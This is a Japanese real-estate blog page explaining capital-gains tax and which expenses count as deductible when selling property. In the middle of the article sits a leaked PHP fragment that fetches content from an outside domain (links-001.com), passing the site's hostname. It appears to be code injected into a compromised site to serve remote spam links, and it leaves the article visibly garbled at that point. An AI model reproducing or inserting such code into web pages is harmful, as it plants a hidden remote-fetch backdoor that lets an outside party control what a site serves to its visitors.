前へ
次へ

不動産業者に売買をお願いする時は

特定の不動産業者に声をかけて、売買の契約をお願いしたい場合には、ひとまずどこの業者に声をかけるのが最

more

不動産の売買のときには登記の確認を

不動産売買契約を締結する前に買主は仲介業者による重要事項説明を受けることになります。
そこで十

more

不動産の売買契約を望むときには

これから実際に、不動産の売買契約を望むと言うのであれば、その仲介を担う業者をしっかりと選ぶことが重要

more

不動産売買でかかる税金と必要経費

不動産売買には色々な税金がかかりますが、売った際に出た利益は譲渡所得税と呼ばれる税金の対象となります。
もちろん売れたときに儲けが出ていない場合には、税金を支払う必要はありませんが、売却金額に必要経費を引き、更に特別控除金額を引いた金額が売却益と呼ばれる不動産物件を売って儲けたお金とみなされる金額です。
必要経費とみなされるのは、不動産会社に支払う仲介手数料をはじめ、売買契約書の印紙代、更に契約する時と引き渡す時にかかった交通費や、建物を取り壊して土地だけ売る場合にかかる建物取り壊し費用などです。
また、事情があって契約をキャンセルした時にかかる違約金なども必要経費とみなされます。
ただし、単なる契約破棄ではなく、より不動産を高く売るために支払った違約金のみ対象です。
また、更地にした土地を売るときには、建物を売る1年以内に取り壊していることが経費とみなされるポイントといえます。
一般的に建物を取り壊す時には、契約が成立してから取り壊すことが多いです。
1年以上たってから売ると、税務署側に必要経費とみなされなくなるため、注意してください。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

必要経費とみなされないのは不用意に日帰り可能な契約場所に宿泊した費用や、物件の維持管理費用、引越し代などです。
また、保有してきた物件にかかる固定資産税も必要経費とはみなされません。
必要経費の金額が違うだけでなく、項目の内容を細かく計算して最終的な税金が算出されるため、入る経費と入らない経費を明確にしておくことが必要です。
また、最終的に算出されるまでに、ある程度時間がかかるため、注意してください。
忘れた頃に税金の請求がある場合も多いといわれています。
物件を売ってそのお金で新たな物件を買うという人もいますが、そのまま持っていて子供の大学費用に使うなど、使い道は様々です。
税金の請求が来る前に使い切ってしまわないように、お金の管理をしっかりしておくことが必要といわれています。

Page Top